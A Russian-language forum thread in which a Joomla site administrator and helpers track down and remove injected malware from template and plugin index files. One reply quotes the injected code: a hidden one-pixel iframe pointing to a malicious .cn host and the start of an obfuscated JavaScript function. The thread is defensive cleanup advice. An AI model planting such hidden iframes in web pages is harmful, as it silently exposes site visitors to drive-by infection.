Появлилось сообщение о трояне на сайте, но есть ньюанс... - Безопасность сайтов на Joomla

В общем, дело обстоит так: при заходе на сайт с компьютера на котором установлен антивирус Касперского появляется сообщение "Этот сайт опасен бла бла бла и вваливается ссылка, что происходит перенаправление на страничку http://phrhrhrhereo.cn/ex/index.php Но перенаправления на происходит! Троян пока себя вообще никак на проявляет! Проверял разныим онлайновыми проверялками (прошу прощения за каламбур:)): http://www.burbon.ru/sites/virus.php - стабильно находит, www.webscanner.ru - Сайт содержит подозрительный (скрытый) IFRAME Это не означает, что сайт обязательно опасен. Однако, вызывает подозрения, http://online.us.drweb.com  - ничего не находит.  Вебмастер яндекса говорит, что "Сайт может угрожать безопасности вашего компьютера" вредоносный код находится на всех страницах сайта.

С моего компьютера при заходе на сайт ничего не обнаруживается, но это, наверное, из-за отстойного антивируса:)
Сохранил копию сайта на комп, поглядел index.php, но IFRAMEов на нашел. Проконсультируйте как отловить гада.
P.S.: Вот наш сайт - http://mordovoobraz.68edu.ru
Загляните, если можете, напишите у кого что видно.
P.P.S.: Joomla 1.5.9.
Администрирую с работы, через 10-ю оперу, на фтп заливаю через FileZilla'у, Win XP со всеми заплатками, антивирус - AVG 8.0 Antivirus Free (на платный антивирус у начальства жалко денег).
Еще раз извиняюсь, но до четверга не смогу отвечать на вопросы, если у кого будут - выходной, однако:).

поглядел index.php, но IFRAMEов на нашел. Проконсультируйте как отловить гада.
P.S.: Вот наш сайт - http://mordovoobraz.68edu.ru
Загляните, если можете, напишите у кого что видно.

Видно следующее:
1. Вирус есть, можете не сомневаться.
2. iframe вставлен, можете быть уверены. Проверять нужно не только корневой index.php, но и все индексные файлы во всех директориях (причём не только index.php но и index.html). Начать можно с шаблона. Торчит он где-то в самом начале страницы внутри <div id="ja-search"> вместе с вирусным js
3. Рекомендуется почитать здесь.

Проглядел index.html файлы шаблонов - действительно нашел строки с вредоносным кодом. Заменил все файлы на "чистые" из оригинального дистрибутива. Зашел на webscanner.ru, проверил сайт - по прежнему есть сообщение, что "Сайт содержит подозрительный (скрытый) IFRAME", где еще может прятаться троян? Или проблема в том, что вебсканнер не сразу индексирует сайт?

Терпеливый, файлы index.html к движку, по большому счёту, вообще никакого отношения не имеют. Они предотвращают просмотр директории при неправильно настроенном сервере, и всё. Вредителя искать нужно в файле index.php шаблона, как уже написано выше.

Терпеливый, файлы index.html к движку, по большому счёту, вообще никакого отношения не имеют. Они предотвращают просмотр директории при неправильно настроенном сервере, и всё. Вредителя искать нужно в файле index.php шаблона, как уже написано выше.

Отсмотрел все индексные файлы в папке шаблонов, но вирусного кода не нашел, хотя это может быть из-за слабого знания php:)
Пошел радикальным путем - поменял всю папку шаблонов на папку из дистрибутива Joomla.
Не хочу показаться навязчивым, но не может ли кто (главное чтоб у Вас был установлен хороший антивирус:)) зайти на сайт http://mordovoobraz.68edu.ru и отписаться, есть ли какие сообщения о вирусах.
P.S.: Только не считайте это рекламой и не баньте меня:).

Ваш вирус в целости и сохранности, там же, где и был.

из-за слабого знания php:)

Вирус не на php, это банальнейший html-код, вставляющий iframe

<iframe width="1" height="1" frameborder="0" src="http://thrhrhrhereo.cn/in.cgi?2" border="0">

плюс код JavaScript

<script>function icZmY(iCc, iLeW, Yvpx){var zgwPFKvA=Yvpx.split(iLeW);... и т.д.

Всё это расположено в блоке <div id="ja-search"> сразу за открывающим тэгом.

Ваш вирус в целости и сохранности, там же, где и был.
Вирус не на php, это банальнейший html-код, вставляющий iframeплюс код JavaScriptВсё это расположено в блоке <div id="ja-search"> сразу за открывающим тэгом.

Вот как раз такой код и был вписан в index.html файлы в шаблонах.
Побродив по интернету я нашел на этой странице http://www.vashmaster.ru/informaciya/o_sozdanii_saytov/news52.php
маленький скрипт по поиску iframe'ов, просканировал весь сайт и в результате нашлось более 200-т предположительно зараженных файлов.
Сейчас вручную отсматриваю файлы и вырезаю вреднючий код - везде одинаковый и встречается пока только в index.html разных плагинов и модулей.
Какая скучная работа...
P.S.: В итоге оказалось около 60 зараженных файлов - все index.html, в остальных вроде все чисто.

Наконец-то на www.burbon.ru появилось сообщение:
На странице http://mordovoobraz.68edu.ru/ вредоносный код не обнаружен!
Оказалось, что троян сидел еще в нескольких php файлах в компоненте поиска.
Немного изменил условие поиска - и все чисто!

Ты уж не забудь  пароль на ФТП поменять и не хранить его в програме  которой пользуешся для доступа , а то опять закинут вирусяк

Ребята помогите! Нашёл вирус он во всех файлах index.html и index.html и файлах js. Этих файлов очень много я удалил код больше чем 300 файлов и потратил 3 часа. Есть другой способ или только руками?

Есть другой способ или только руками?

да конечно, восстановить из резервной копии (а она обязана быть, как презерватив в бумажнике - всегда)

да конечно, восстановить из резервной копии (а она обязана быть, как презерватив в бумажнике - всегда)

Не поверите  но её нет. У меня вдс там за бэкап надо или платить или вручную что-то в этом роде а я этого не сделал. Да и бэкап врятли бы помог , так как иди знай когда вирус залез.

походу кто то ломает Joomla и впаривает туда трояны.

да никто Joomla не ломает, просто нефиг держать пароль в ФТП клиенте. Читайте выше по топику

у меня стоит каспер. но всетаки надеюсь что не ломают а то как то грусно будет.